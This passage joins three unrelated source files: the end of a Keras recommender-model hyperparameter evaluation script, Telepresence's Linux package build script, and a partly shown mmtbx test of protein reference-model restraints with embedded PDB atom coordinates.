mae_ci_min, mae_ci_max = bootstrap_ci(mean_absolute_error, [preds, rating])
results = {}
results[prefix + '_mse'] = mse
results[prefix + '_mae'] = mae
results[prefix + '_mae_ci_min'] = mae_ci_min
results[prefix + '_mae_ci_max'] = mae_ci_max
return results, preds
def evaluate_one(**kwargs):
# Create a single threaded TF session for this Python thread:
# parallelism is leveraged at a coarser level with dask
session = tf.Session(
# graph=tf.Graph(),
config=tf.ConfigProto(intra_op_parallelism_threads=1))
with session.as_default():
# graph-level deterministic weights init
tf.set_random_seed(0)
_evaluate_one(**kwargs)
def _evaluate_one(**kwargs):
params = DEFAULT_PARAMS.copy()
params.update(kwargs)
params_digest = joblib.hash(params)
results = params.copy()
results['digest'] = params_digest
results_folder = Path('results')
results_folder.mkdir(exist_ok=True)
folder = results_folder.joinpath(params_digest)
folder.mkdir(exist_ok=True)
if len(list(folder.glob("*/results.json"))) == 4:
print('Skipping')
split_idx = params.get('split_idx', 0)
print("Evaluating model on split #%d:" % split_idx)
pprint(params)
ratings_train, ratings_test = train_test_split(
all_ratings, test_size=0.2, random_state=split_idx)
max_user_id = all_ratings['user_id'].max()
max_item_id = all_ratings['item_id'].max()
user_id_train = ratings_train['user_id']
item_id_train = ratings_train['item_id']
rating_train = ratings_train['rating']
user_id_test = ratings_test['user_id']
item_id_test = ratings_test['item_id']
rating_test = ratings_test['rating']
loss = params.get('loss', DEFAULT_LOSS)
if loss == 'cross_entropy':
target_train = rating_train - 1
else:
target_train = rating_train
model = make_model(max_user_id + 1, max_item_id + 1, **params)
results['model_size'] = sum(w.size for w in model.get_weights())
nb_epoch = 5
epochs = 0
for i in range(4):
epochs += nb_epoch
t0 = time()
model.fit([user_id_train, item_id_train], target_train,
batch_size=params['batch_size'],
nb_epoch=nb_epoch, shuffle=True, verbose=False)
epoch_duration = (time() - t0) / nb_epoch
train_scores, train_preds = _compute_scores(
model, 'train', user_id_train, item_id_train, rating_train, loss)
results.update(train_scores)
test_scores, test_preds = _compute_scores(
model, 'test', user_id_test, item_id_test, rating_test, loss)
results.update(test_scores)
results['epoch_duration'] = epoch_duration
results['epochs'] = epochs
subfolder = folder.joinpath("%03d" % epochs)
subfolder.mkdir(exist_ok=True)
# Transactional results saving to avoid file corruption on ctrl-c
results_filepath = subfolder.joinpath(RESULTS_FILENAME)
with transactional_open(results_filepath, mode='w') as f:
json.dump(results, f)
model_filepath = subfolder.joinpath(MODEL_FILENAME)
with transactional_fname(model_filepath) as fname:
model.save(fname)
# Save predictions and true labels to be able to recompute new scores
# later
with transactional_open(subfolder / 'test_preds.npy', mode='wb') as f:
np.save(f, test_preds)
with transactional_open(subfolder / 'train_preds.npy', mode='wb') as f:
np.save(f, test_preds)
with transactional_open(subfolder / 'ratings.npy', mode='wb') as f:
np.save(f, rating_test)
return params_digest
def _model_complexity_proxy(params):
# Quick approximation of the number of tunable parameter to rank models
# by increasing complexity
embedding_size = params['embedding_size']
n_hidden = params['n_hidden']
if n_hidden == 0:
return embedding_size * 2
else:
hidden_size = params['hidden_size']
return (2 * embedding_size * hidden_size +
(n_hidden - 1) * hidden_size ** 2)
if __name__ == "__main__":
seed = 0
n_params = 500
all_combinations = list(ParameterGrid(SEARCH_SPACE))
random.Random(seed).shuffle(all_combinations)
sampled_params = all_combinations[:n_params]
sampled_params.sort(key=_model_complexity_proxy)
evaluations = []
for params in sampled_params:
for split_idx in range(3):
evaluations.append(delayed(evaluate_one)(
split_idx=split_idx, **params))
compute(*evaluations)
|
#!/usr/bin/env python3
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Create Ubuntu and Fedora packages in dist.
Usage:
create-linux-packages.py <release-version>
"""
import sys
from pathlib import Path
from typing import List
from container import Container
from distros import distros
THIS_DIRECTORY = Path(__file__).absolute().resolve().parent
DIST = THIS_DIRECTORY.parent / "dist"
def show_banner(text, char="=", width=79):
"""
Make it easy to show what's going on
"""
res = char * 2 + " " + text
remaining = width - len(res) - 1
if remaining > 0:
res += " " + char * remaining
print("\n" + res + "\n")
def prep_to_build() -> Container:
"""
Prepare container to build packages
"""
con = Container("alpine:3.7")
con.execute_sh("apk update -q")
con.execute_sh("apk add -q alpine-sdk dpkg-dev rpm-dev ruby ruby-dev")
con.execute_sh("gem install -q --no-ri --no-rdoc fpm")
con.copy_to(str(DIST / "telepresence"), "/usr/bin")
con.copy_to(str(DIST / "sshuttle-telepresence"), "/usr/bin")
return con
def build_package(
con: Container, name: str, version: str, dependencies: List[str],
package_type: str
) -> str:
"""
Build a package in the prepared build container
"""
fpm_header = [
"fpm",
"--name=telepresence",
"--version={}".format(version),
"--description=Local development for a remote Kubernetes cluster.",
"--input-type=dir",
]
fpm_deps = ["--depends={}".format(dep) for dep in dependencies]
fpm_type = ["--output-type={}".format(package_type)]
fpm_trailer = [
"/usr/bin/sshuttle-telepresence",
"/usr/bin/telepresence",
]
target_path = DIST / name
target_path.mkdir()
pkg_dir = "/" + name
con.execute_sh("mkdir {}".format(pkg_dir))
con.execute(fpm_header + fpm_deps + fpm_type + fpm_trailer, cwd=pkg_dir)
pkg_name = con.execute_sh("ls", cwd=pkg_dir).strip()
con.copy_from(str(Path(pkg_dir) / pkg_name), str(target_path))
rel_package = str(Path(name) / pkg_name)
return rel_package
def test_package(image: str, package: Path, install_cmd: str):
"""
Test a package can be installed and Telepresence run.
"""
con = Container(image)
con.execute_sh("mkdir /packages")
con.copy_to(str(package), "/packages")
package_path = "/packages/{}".format(package.name)
command = "set -e\n{}".format(install_cmd).format(package_path)
con.execute(["sh", "-c", command])
con.execute_sh("python3 --version")
con.execute_sh("telepresence --version")
con.execute_sh("sshuttle-telepresence --version")
def get_upload_commands(system, release, package):
"""Returns the required package_cloud commands to upload this package"""
repos = ["datawireio/stable", "datawireio/telepresence"]
res = []
for repo in repos:
res.append(
"package_cloud push {}/{}/{} {}".format(
repo, system, release, package
)
)
return res
def main(version):
"""Create Linux packages"""
show_banner("Building packages...")
con = prep_to_build()
uploads = []
for system, release, package_type, dependencies, install_cmd in distros:
name = "{}-{}".format(system, release)
show_banner("Build {}".format(name))
rel_package = build_package(
con, name, version, dependencies, package_type
)
package = DIST / rel_package
show_banner("Test {}".format(name))
image = "{}:{}".format(system, release)
test_package(image, package, install_cmd)
rel_package = package.relative_to(DIST)
uploads.extend(get_upload_commands(system, release, rel_package))
upload_script = Path(DIST / "upload_linux_packages.sh")
with upload_script.open("w") as f:
f.write("#!/bin/sh\n\n")
f.write("set -e\n\n")
f.write('cd "$(dirname "$0")"\n')
f.write("\n".join(uploads))
f.write("\n")
upload_script.chmod(0o775)
if __name__ == '__main__':
main(sys.argv[1])
|
from __future__ import division
from mmtbx import monomer_library
from mmtbx.geometry_restraints.torsion_restraints.reference_model import \
reference_model, reference_model_params
from mmtbx.geometry_restraints.torsion_restraints import utils
from mmtbx.validation.rotalyze import rotalyze
import mmtbx.model
from cctbx.array_family import flex
import iotbx.phil
import iotbx.pdb
from libtbx.test_utils import show_diff
import libtbx.load_env
import cStringIO
import sys, os, time
model_raw_records = """\
CRYST1 41.566 72.307 92.870 108.51 93.02 90.06 P 1 4
ATOM 5466 N ASN C 236 17.899 72.943 29.028 1.00 60.13 N
ATOM 5467 CA ASN C 236 16.519 72.435 29.114 1.00 60.52 C
ATOM 5468 C ASN C 236 16.377 70.925 29.327 1.00 60.49 C
ATOM 5469 O ASN C 236 15.429 70.294 28.863 1.00 60.60 O
ATOM 5470 CB ASN C 236 15.689 72.896 27.916 1.00 60.55 C
ATOM 5471 CG ASN C 236 14.357 73.447 28.338 1.00 61.75 C
ATOM 5472 OD1 ASN C 236 14.256 74.609 28.768 1.00 62.86 O
ATOM 5473 ND2 ASN C 236 13.319 72.616 28.247 1.00 61.22 N
ATOM 5474 N LEU C 237 17.316 70.364 30.068 1.00 60.55 N
ATOM 5475 CA LEU C 237 17.444 68.931 30.166 1.00 60.48 C
ATOM 5476 C LEU C 237 17.815 68.555 31.581 1.00 60.06 C
ATOM 5477 O LEU C 237 17.335 67.547 32.097 1.00 60.41 O
ATOM 5478 CB LEU C 237 18.518 68.464 29.178 1.00 60.91 C
ATOM 5479 CG LEU C 237 18.542 67.095 28.491 1.00 62.25 C
ATOM 5480 CD1 LEU C 237 17.407 66.153 28.923 1.00 63.18 C
ATOM 5481 CD2 LEU C 237 18.563 67.309 26.965 1.00 62.89 C
"""
reference_raw_records = """\
CRYST1 40.688 71.918 93.213 108.16 93.25 90.40 P 1 4
ATOM 5485 N ASN C 236 16.417 72.834 29.095 1.00 7.17 N
ATOM 5486 CA ASN C 236 15.051 72.312 29.173 1.00 7.74 C
ATOM 5487 C ASN C 236 15.000 70.818 29.431 1.00 7.38 C
ATOM 5488 O ASN C 236 14.047 70.141 29.024 1.00 7.80 O
ATOM 5489 CB ASN C 236 14.281 72.645 27.887 1.00 8.78 C
ATOM 5490 CG ASN C 236 12.769 72.657 28.088 1.00 13.44 C
ATOM 5491 OD1 ASN C 236 12.265 73.196 29.082 1.00 20.19 O
ATOM 5492 ND2 ASN C 236 12.032 72.114 27.109 1.00 16.07 N
ATOM 5493 N LEU C 237 16.010 70.282 30.134 1.00 6.60 N
ATOM 5494 CA LEU C 237 16.122 68.825 30.270 1.00 7.41 C
ATOM 5495 C LEU C 237 16.481 68.430 31.697 1.00 6.01 C
ATOM 5496 O LEU C 237 15.944 67.448 32.224 1.00 6.47 O
ATOM 5497 CB LEU C 237 17.151 68.239 29.297 1.00 8.10 C
ATOM 5498 CG LEU C 237 17.384 66.726 29.347 1.00 10.94 C
ATOM 5499 CD1 LEU C 237 16.055 65.956 29.107 1.00 13.10 C
ATOM 5500 CD2 LEU C 237 18.455 66.271 28.343 1.00 11.63 C
"""
reference_raw_records_alt_seq = """\
CRYST1 40.688 71.918 93.213 108.16 93.25 90.40 P 1 4
ATOM 5485 N ASN B 246 16.417 72.834 29.095 1.00 7.17 N
ATOM 5486 CA ASN B 246 15.051 72.312 29.173 1.00 7.74 C
ATOM 5487 C ASN B 246 15.000 70.818 29.431 1.00 7.38 C
ATOM 5488 O ASN B 246 14.047 70.141 29.024 1.00 7.80 O
ATOM 5489 CB ASN B 246 14.281 72.645 27.887 1.00 8.78 C
ATOM 5490 CG ASN B 246 12.769 72.657 28.088 1.00 13.44 C
ATOM 5491 OD1 ASN B 246 12.265 73.196 29.082 1.00 20.19 O
ATOM 5492 ND2 ASN B 246 12.032 72.114 27.109 1.00 16.07 N
ATOM 5493 N LEU B 247 16.010 70.282 30.134 1.00 6.60 N
ATOM 5494 CA LEU B 247 16.122 68.825 30.270 1.00 7.41 C
ATOM 5495 C LEU B 247 16.481 68.430 31.697 1.00 6.01 C
ATOM 5496 O LEU B 247 15.944 67.448 32.224 1.00 6.47 O
ATOM 5497 CB LEU B 247 17.151 68.239 29.297 1.00 8.10 C
ATOM 5498 CG LEU B 247 17.384 66.726 29.347 1.00 10.94 C
ATOM 5499 CD1 LEU B 247 16.055 65.956 29.107 1.00 13.10 C
ATOM 5500 CD2 LEU B 247 18.455 66.271 28.343 1.00 11.63 C
"""
reference_raw_records_match = """\
CRYST1 40.688 71.918 93.213 108.16 93.25 90.40 P 1 4
ATOM 5485 N ASN C 270 16.417 72.834 29.095 1.00 7.17 N
ATOM 5486 CA ASN C 270 15.051 72.312 29.173 1.00 7.74 C
ATOM 5487 C ASN C 270 15.000 70.818 29.431 1.00 7.38 C
ATOM 5488 O ASN C 270 14.047 70.141 29.024 1.00 7.80 O
ATOM 5489 CB ASN C 270 14.281 72.645 27.887 1.00 8.78 C
ATOM 5490 CG ASN C 270 12.769 72.657 28.088 1.00 13.44 C
ATOM 5491 OD1 ASN C 270 12.265 73.196 29.082 1.00 20.19 O
ATOM 5492 ND2 ASN C 270 12.032 72.114 27.109 1.00 16.07 N
ATOM 5493 N ALA C 271 16.010 70.282 30.134 1.00 6.60 N
ATOM 5494 CA ALA C 271 16.122 68.825 30.270 1.00 7.41 C
ATOM 5495 C ALA C 271 16.481 68.430 31.697 1.00 6.01 C
ATOM 5496 O ALA C 271 15.944 67.448 32.224 1.00 6.47 O
ATOM 5497 CB ALA C 271 17.151 68.239 29.297 1.00 8.10 C
"""
def exercise_reference_model(args, mon_lib_srv, ener_lib):
log = cStringIO.StringIO()
work_params = reference_model_params.extract()
work_params.reference_model.enabled = True
work_params.reference_model.fix_outliers = False
model = mmtbx.model.manager(
model_input = iotbx.pdb.input(lines=flex.split_lines(model_raw_records),
source_info=None),
process_input=True)
pdb_h = model.get_hierarchy()
reference_hierarchy_list = []
tmp_hierarchy = iotbx.pdb.input(
source_info=None,
lines=flex.split_lines(reference_raw_records)).construct_hierarchy()
reference_hierarchy_list.append(tmp_hierarchy)
rm = reference_model(
model=model,
reference_hierarchy_list=reference_hierarchy_list,
params=work_params.reference_model,
log=log)
assert rm.get_n_proxies() == 5, "Got %d, expected 5" % rm.get_n_proxies()
reference_hierarchy_list_alt_seq = []
tmp_hierarchy = iotbx.pdb.input(
source_info=None,
lines=flex.split_lines(reference_raw_records_alt_seq)).\
construct_hierarchy()
reference_hierarchy_list_alt_seq.append(tmp_hierarchy)
reference_hierarchy_list_ref_match = []
tmp_hierarchy = iotbx.pdb.input(
source_info=None,
lines=flex.split_lines(reference_raw_records_match)).\
construct_hierarchy()
reference_hierarchy_list_ref_match.append(tmp_hierarchy)
i_seq_name_hash = utils.build_name_hash(
pdb_hierarchy=pdb_h)
assert i_seq_name_hash == \
{0: ' N ASN C 236 ', 1: ' CA ASN C 236 ',
2: ' C ASN C 236 ', 3: ' O ASN C 236 ',
4: ' CB ASN C 236 ', 5: ' CG ASN C 236 ',
6: ' OD1 ASN C 236 ', 7: ' ND2 ASN C 236 ',
8: ' N LEU C 237 ', 9: ' CA LEU C 237 ',
10: ' C LEU C 237 ', 11: ' O LEU C 237 ',
12: ' CB LEU C 237 ', 13: ' CG LEU C 237 ',
14: ' CD1 LEU C 237 ', 15: ' CD2 LEU C 237 '}
i_seq_element_hash = utils.build_element_hash(
pdb_hierarchy=pdb_h)
assert i_seq_element_hash == \
{0: 'N', 1: 'C', 2: 'C', 3: 'O', 4: 'C', 5: 'C', 6: 'O', 7: 'N', 8: 'N',
9: 'C', 10: 'C', 11: 'O', 12: 'C', 13: 'C', 14: 'C', 15: 'C'}
ref_pdb_hierarchy = reference_hierarchy_list[0]
dihedral_proxies = \
utils.get_complete_dihedral_proxies(pdb_hierarchy=ref_pdb_hierarchy)
sites_cart_ref = ref_pdb_hierarchy.atoms().extract_xyz()
dihedral_hash = rm.build_dihedral_hash(
dihedral_proxies=dihedral_proxies,
sites_cart=sites_cart_ref,
pdb_hierarchy=ref_pdb_hierarchy,
include_hydrogens=False,
include_main_chain=True,
include_side_chain=True)
assert len(dihedral_hash) == 5
reference_dihedral_proxies = rm.reference_dihedral_proxies.deep_copy()
assert reference_dihedral_proxies is not None
assert len(reference_dihedral_proxies) == len(dihedral_hash)
for rdp in reference_dihedral_proxies:
assert rdp.limit == work_params.reference_model.limit
r1 = rotalyze(pdb_hierarchy=pdb_h, outliers_only=False)
out1 = cStringIO.StringIO()
r1.show_old_output(out=out1)
r2 = rotalyze(pdb_hierarchy=ref_pdb_hierarchy, outliers_only=False)
out2 = cStringIO.StringIO()
r2.show_old_output(out=out2)
assert not show_diff(out1.getvalue(), """\
C 236 ASN:1.00:0.2:227.3:80.2:::OUTLIER:OUTLIER
C 237 LEU:1.00:0.0:209.6:357.2:::OUTLIER:OUTLIER
""")
assert not show_diff(out2.getvalue(), """\
C 236 ASN:1.00:39.1:203.2:43.6:::Favored:t0
C 237 LEU:1.00:60.8:179.1:57.3:::Favored:tp
""")
xray_structure = pdb_h.extract_xray_structure()
rm.set_rotamer_to_reference(
xray_structure=xray_structure,
mon_lib_srv=mon_lib_srv,
quiet=True)
pdb_h.adopt_xray_structure(xray_structure)
r2 = rotalyze(pdb_hierarchy=pdb_h, outliers_only=False)
out3 = cStringIO.StringIO()
r2.show_old_output(out=out3)
assert not show_diff(out3.getvalue(), """\
C 236 ASN:1.00:39.1:203.2:43.6:::Favored:t0
C 237 LEU:1.00:60.8:179.1:57.3:::Favored:tp
""")
match_map = rm.match_map['ref0']
assert match_map == \
{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10, 11: 11,
12: 12, 13: 13, 14: 14, 15: 15}
master_phil_str_overrides = """
reference_model.reference_group {
reference= chain B and resseq 246:247
selection= chain C and resid 236:237
}
"""
def_pars = reference_model_params
pars = iotbx.phil.parse(master_phil_str_overrides)
all_pars = def_pars.fetch(pars).extract()
all_pars.reference_model.enabled = True
rm = reference_model(
model = model,
reference_hierarchy_list=reference_hierarchy_list_alt_seq,
params=all_pars.reference_model,
log=log)
match_map = rm.match_map
assert match_map['ref0'] == \
{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10, 11: 11,
12: 12, 13: 13, 14: 14, 15: 15}
pdb_file = libtbx.env.find_in_repositories(
relative_path="phenix_regression/pdb/1ywf.pdb",
test=os.path.isfile)
model = mmtbx.model.manager(
model_input = iotbx.pdb.input(file_name=pdb_file,
source_info=None),
process_input=True)
pdb_h = model.get_hierarchy()
# pdb_hierarchy = iotbx.pdb.input(file_name=pdb_file).construct_hierarchy()
reference_file_list = []
reference_file_list.append(pdb_file)
work_pars = reference_model_params.extract()
work_pars.reference_model.fix_outliers = False
work_pars.reference_model.enabled = True
rm = reference_model(
model=model,
reference_file_list=reference_file_list,
params=work_pars.reference_model,
log=log)
reference_dihedral_proxies = rm.reference_dihedral_proxies
standard_weight = 0
for dp in reference_dihedral_proxies:
if dp.weight == 1.0:
standard_weight += 1
assert standard_weight == 1181, "Expecting 1181, got %d" % standard_weight
if (not libtbx.env.has_module(name="ksdssp")):
print "Skipping KSDSSP tests: ksdssp module not available."
else:
work_pars = reference_model_params.extract()
work_pars.reference_model.secondary_structure_only = True
work_pars.reference_model.enabled = True
rm.params = work_pars.reference_model
rm.get_reference_dihedral_proxies(model=model)
reference_dihedral_proxies = rm.reference_dihedral_proxies
ss_weight = 0
for dp in reference_dihedral_proxies:
if dp.weight == 1.0:
ss_weight += 1
assert ss_weight == 694, "expecting 694 proxies, got %d" % ss_weight
#test SSM alignment
pdb_file = libtbx.env.find_in_repositories(
relative_path="phenix_regression/ncs/rnase-s.pdb",
test=os.path.isfile)
pdb_hierarchy = iotbx.pdb.input(file_name=pdb_file).construct_hierarchy()
reference_file_list = []
reference_file_list.append(pdb_file)
pdb_hierarchy.reset_i_seq_if_necessary()
import ccp4io_adaptbx
ssm = ccp4io_adaptbx.SecondaryStructureMatching(
reference=pdb_hierarchy.models()[0].chains()[0],
moving=pdb_hierarchy.models()[0].chains()[1])
alignment = ccp4io_adaptbx.SSMAlignment.residue_groups(match=ssm)
assert ssm.GetQvalues()[0] > 0.98
def exercise_multiple_to_one(args, mon_lib_srv, ener_lib):
pdb_str_original = """\
CRYST1 69.211 49.956 52.557 90.00 90.00 90.00 P 1
ATOM 1 N THR A 3 51.193 44.956 23.993 1.00 80.52 N
ATOM 2 CA THR A 3 50.812 43.732 23.211 1.00 80.52 C
ATOM 4 CB THR A 3 50.446 42.559 24.181 1.00 79.62 C
ATOM 6 OG1 THR A 3 50.206 41.358 23.433 1.00 79.62 O
ATOM 8 CG2 THR A 3 49.239 42.888 25.066 1.00 79.62 C
ATOM 12 C THR A 3 49.657 44.014 22.221 1.00 80.52 C
ATOM 13 O THR A 3 48.520 44.223 22.631 1.00 80.52 O
ATOM 17 N GLY A 4 49.963 44.013 20.917 1.00 79.31 N
ATOM 18 CA GLY A 4 49.030 44.458 19.892 1.00 79.31 C
ATOM 21 C GLY A 4 48.761 43.480 18.761 1.00 79.31 C
ATOM 22 O GLY A 4 47.790 42.725 18.808 1.00 79.31 O
ATOM 24 N ALA A 5 49.581 43.499 17.715 1.00 78.81 N
ATOM 25 CA ALA A 5 49.395 42.604 16.581 1.00 78.81 C
ATOM 27 CB ALA A 5 49.774 43.314 15.283 1.00 77.40 C
ATOM 31 C ALA A 5 50.195 41.315 16.714 1.00 78.81 C
ATOM 32 O ALA A 5 50.258 40.537 15.757 1.00 78.81 O
ATOM 34 N GLN A 6 50.816 41.073 17.872 1.00 80.55 N
ATOM 35 CA GLN A 6 51.642 39.880 18.018 1.00 80.55 C
ATOM 37 CB GLN A 6 52.383 39.879 19.354 1.00 79.84 C
ATOM 40 CG GLN A 6 53.264 41.072 19.596 1.00 79.84 C
ATOM 43 CD GLN A 6 52.490 42.211 20.225 1.00 79.84 C
ATOM 44 OE1 GLN A 6 51.290 42.091 20.489 1.00 79.84 O
ATOM 45 NE2 GLN A 6 53.167 43.325 20.468 1.00 79.84 N
ATOM 48 C GLN A 6 50.788 38.631 17.945 1.00 80.55 C
ATOM 49 O GLN A 6 51.148 37.659 17.273 1.00 80.55 O
ATOM 51 N VAL A 7 49.643 38.651 18.631 1.00 79.06 N
ATOM 52 CA VAL A 7 48.822 37.460 18.795 1.00 79.06 C
ATOM 54 CB VAL A 7 47.610 37.794 19.688 1.00 78.99 C
ATOM 56 CG1 VAL A 7 46.649 36.606 19.794 1.00 78.99 C
ATOM 60 CG2 VAL A 7 48.075 38.245 21.063 1.00 78.99 C
ATOM 64 C VAL A 7 48.399 36.907 17.450 1.00 79.06 C
ATOM 65 O VAL A 7 47.962 35.755 17.360 1.00 79.06 O
ATOM 67 N TYR A 8 48.538 37.700 16.390 1.00 79.78 N
ATOM 68 CA TYR A 8 48.445 37.147 15.051 1.00 79.78 C
ATOM 70 CB TYR A 8 48.732 38.228 14.014 1.00 77.69 C
ATOM 73 CG TYR A 8 48.634 37.736 12.583 1.00 77.69 C
ATOM 74 CD1 TYR A 8 47.404 37.638 11.944 1.00 77.69 C
ATOM 76 CE1 TYR A 8 47.308 37.187 10.640 1.00 77.69 C
ATOM 78 CZ TYR A 8 48.444 36.802 9.966 1.00 77.69 C
ATOM 79 OH TYR A 8 48.355 36.348 8.672 1.00 77.69 O
ATOM 81 CE2 TYR A 8 49.672 36.872 10.580 1.00 77.69 C
ATOM 83 CD2 TYR A 8 49.763 37.333 11.883 1.00 77.69 C
ATOM 85 C TYR A 8 49.416 35.991 14.857 1.00 79.78 C
ATOM 86 O TYR A 8 49.202 35.164 13.967 1.00 79.78 O
ATOM 88 N ALA A 9 50.475 35.912 15.671 1.00 79.03 N
ATOM 89 CA ALA A 9 51.463 34.844 15.546 1.00 79.02 C
ATOM 91 CB ALA A 9 52.444 34.896 16.719 1.00 79.18 C
ATOM 95 C ALA A 9 50.833 33.459 15.484 1.00 79.02 C
ATOM 96 O ALA A 9 51.470 32.524 14.982 1.00 79.02 O
ATOM 98 N ASN A 10 49.611 33.298 16.002 1.00 79.63 N
ATOM 99 CA ASN A 10 48.890 32.036 15.896 1.00 79.63 C
ATOM 101 CB ASN A 10 47.838 31.938 17.002 1.00 78.91 C
ATOM 104 CG ASN A 10 48.455 31.885 18.387 1.00 78.91 C
ATOM 105 OD1 ASN A 10 49.636 31.603 18.527 1.00 78.91 O
ATOM 106 ND2 ASN A 10 47.648 32.113 19.418 1.00 78.91 N
ATOM 109 C ASN A 10 48.213 31.859 14.543 1.00 79.63 C
ATOM 110 O ASN A 10 47.724 30.767 14.246 1.00 79.63 O
TER 58 ASN A 10
ATOM 1990 N THR B 3 21.107 5.000 45.226 1.00 82.71 N
ATOM 1991 CA THR B 3 21.187 6.487 45.312 1.00 82.71 C
ATOM 1993 CB THR B 3 20.105 7.035 46.286 1.00 80.11 C
ATOM 1995 OG1 THR B 3 20.201 6.377 47.557 1.00 80.11 O
ATOM 1997 CG2 THR B 3 18.701 6.831 45.702 1.00 80.11 C
ATOM 2001 C THR B 3 22.604 6.951 45.721 1.00 82.71 C
ATOM 2002 O THR B 3 23.561 6.189 45.599 1.00 82.71 O
ATOM 2006 N GLY B 4 22.752 8.203 46.153 1.00 80.69 N
ATOM 2007 CA GLY B 4 24.064 8.716 46.532 1.00 80.69 C
ATOM 2010 C GLY B 4 25.028 8.902 45.376 1.00 80.69 C
ATOM 2011 O GLY B 4 26.250 8.861 45.572 1.00 80.69 O
ATOM 2013 N ALA B 5 24.503 9.142 44.177 1.00 80.08 N
ATOM 2014 CA ALA B 5 25.268 9.118 42.937 1.00 80.09 C
ATOM 2016 CB ALA B 5 26.031 7.798 42.787 1.00 77.84 C
ATOM 2020 C ALA B 5 24.301 9.316 41.777 1.00 80.09 C
ATOM 2021 O ALA B 5 24.660 9.874 40.734 1.00 80.09 O
ATOM 2023 N GLN B 6 23.035 8.849 42.004 1.00 81.52 N
ATOM 2024 CA GLN B 6 21.978 8.970 41.003 1.00 81.53 C
ATOM 2026 CB GLN B 6 20.722 8.250 41.506 1.00 84.25 C
ATOM 2029 CG GLN B 6 19.920 9.000 42.596 1.00 84.24 C
ATOM 2032 CD GLN B 6 20.032 10.516 42.500 1.00 84.25 C
ATOM 2033 OE1 GLN B 6 19.770 11.098 41.447 1.00 84.24 O
ATOM 2034 NE2 GLN B 6 20.441 11.159 43.593 1.00 84.25 N
ATOM 2037 C GLN B 6 21.660 10.426 40.679 1.00 81.52 C
ATOM 2038 O GLN B 6 21.344 10.750 39.530 1.00 81.52 O
ATOM 2040 N VAL B 7 21.740 11.307 41.646 1.00 80.27 N
ATOM 2041 CA VAL B 7 21.376 12.702 41.416 1.00 80.28 C
ATOM 2043 CB VAL B 7 21.371 13.503 42.738 1.00 79.22 C
ATOM 2045 CG1 VAL B 7 21.092 15.002 42.494 1.00 79.23 C
ATOM 2049 CG2 VAL B 7 20.346 12.946 43.687 1.00 79.22 C
ATOM 2053 C VAL B 7 22.311 13.348 40.415 1.00 80.27 C
ATOM 2054 O VAL B 7 21.937 14.328 39.759 1.00 80.27 O
ATOM 2056 N TYR B 8 23.517 12.809 40.259 1.00 79.95 N
ATOM 2057 CA TYR B 8 24.474 13.363 39.313 1.00 79.95 C
ATOM 2059 CB TYR B 8 25.847 12.697 39.486 1.00 79.66 C
ATOM 2062 CG TYR B 8 26.909 13.218 38.529 1.00 79.66 C
ATOM 2063 CD1 TYR B 8 27.478 14.478 38.703 1.00 79.66 C
ATOM 2065 CE1 TYR B 8 28.444 14.958 37.831 1.00 79.66 C
ATOM 2067 CZ TYR B 8 28.865 14.173 36.779 1.00 79.66 C
ATOM 2068 OH TYR B 8 29.825 14.640 35.913 1.00 79.66 O
ATOM 2070 CE2 TYR B 8 28.325 12.919 36.585 1.00 79.66 C
ATOM 2072 CD2 TYR B 8 27.353 12.445 37.459 1.00 79.66 C
ATOM 2074 C TYR B 8 23.951 13.207 37.884 1.00 79.95 C
ATOM 2075 O TYR B 8 24.569 13.705 36.937 1.00 79.95 O
ATOM 2077 N ALA B 9 22.809 12.526 37.712 1.00 80.47 N
ATOM 2078 CA ALA B 9 22.221 12.378 36.382 1.00 80.47 C
ATOM 2080 CB ALA B 9 21.051 11.395 36.420 1.00 78.95 C
ATOM 2084 C ALA B 9 21.758 13.717 35.823 1.00 80.47 C
ATOM 2085 O ALA B 9 21.827 13.949 34.609 1.00 80.47 O
ATOM 2087 N ASN B 10 21.261 14.606 36.684 1.00 78.19 N
ATOM 2088 CA ASN B 10 20.912 15.948 36.235 1.00 78.18 C
ATOM 2090 CB ASN B 10 20.105 16.644 37.329 1.00 78.39 C
ATOM 2093 CG ASN B 10 18.743 16.000 37.542 1.00 78.39 C
ATOM 2094 OD1 ASN B 10 18.177 15.401 36.628 1.00 78.39 O
ATOM 2095 ND2 ASN B 10 18.229 16.094 38.762 1.00 78.39 N
ATOM 2098 C ASN B 10 22.147 16.764 35.859 1.00 78.19 C
ATOM 2099 O ASN B 10 22.037 17.714 35.076 1.00 78.18 O
TER 116 ASN B 10
ATOM 3968 N THR C 3 12.127 9.313 24.749 1.00 79.35 N
ATOM 3969 CA THR C 3 10.942 8.737 24.046 1.00 79.35 C
ATOM 3971 CB THR C 3 11.262 7.332 23.448 1.00 79.78 C
ATOM 3973 OG1 THR C 3 11.663 6.434 24.490 1.00 79.78 O
ATOM 3975 CG2 THR C 3 12.389 7.415 22.416 1.00 79.78 C
ATOM 3979 C THR C 3 9.763 8.654 25.028 1.00 79.35 C
ATOM 3980 O THR C 3 9.889 8.068 26.102 1.00 79.35 O
ATOM 3984 N GLY C 4 8.622 9.230 24.652 1.00 79.79 N
ATOM 3985 CA GLY C 4 7.500 9.425 25.558 1.00 79.79 C
ATOM 3988 C GLY C 4 7.491 10.798 26.210 1.00 79.79 C
ATOM 3989 O GLY C 4 8.275 11.700 25.895 1.00 79.79 O
ATOM 3991 N ALA C 5 6.558 10.952 27.145 1.00 80.31 N
ATOM 3992 CA ALA C 5 6.415 12.204 27.871 1.00 80.31 C
ATOM 3994 CB ALA C 5 5.000 12.293 28.444 1.00 76.75 C
ATOM 3998 C ALA C 5 7.437 12.387 28.995 1.00 80.31 C
ATOM 3999 O ALA C 5 7.578 13.512 29.487 1.00 80.31 O
ATOM 4001 N GLN C 6 8.160 11.330 29.402 1.00 79.57 N
ATOM 4002 CA GLN C 6 8.950 11.380 30.637 1.00 79.57 C
ATOM 4004 CB GLN C 6 9.511 9.998 31.005 1.00 81.75 C
ATOM 4007 CG GLN C 6 10.700 9.510 30.181 1.00 81.75 C
